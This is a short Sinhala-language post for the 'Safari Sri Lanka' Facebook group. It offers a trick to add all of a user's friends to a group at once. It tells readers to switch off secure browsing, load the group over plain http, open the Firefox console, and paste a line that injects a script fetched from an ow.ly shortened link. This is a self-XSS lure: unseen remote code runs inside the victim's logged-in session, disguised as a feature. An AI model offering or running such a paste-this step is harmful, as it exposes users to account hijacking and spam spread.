Safari Sri Lanka

https://www.facebook.com/groups/safari.sri.lanka

group එකට සියලුම මිතුරන් එකවර එකතු කිරීම.( mozilla firefox එකෙන් )

මුලින්ම Account setting > Security > Secure browsing off කරන්න.

1. Firefox ගිහින් මිතුරන් එකතු කල යුතු group එකට යන්න. https හරහා නොවිය යුතුයි.

2. CTRL + SHIFT + K යතුරු එකවර ඔබන්න.

3. පහත දී තිබෙන script code එක copy/paste කරන්න.

document.body.appendChild(document.createElement('script')).src='http://ow.ly/iGyVD';

ඊට පස්සේ Enter key එක ඔබන්න.

===========================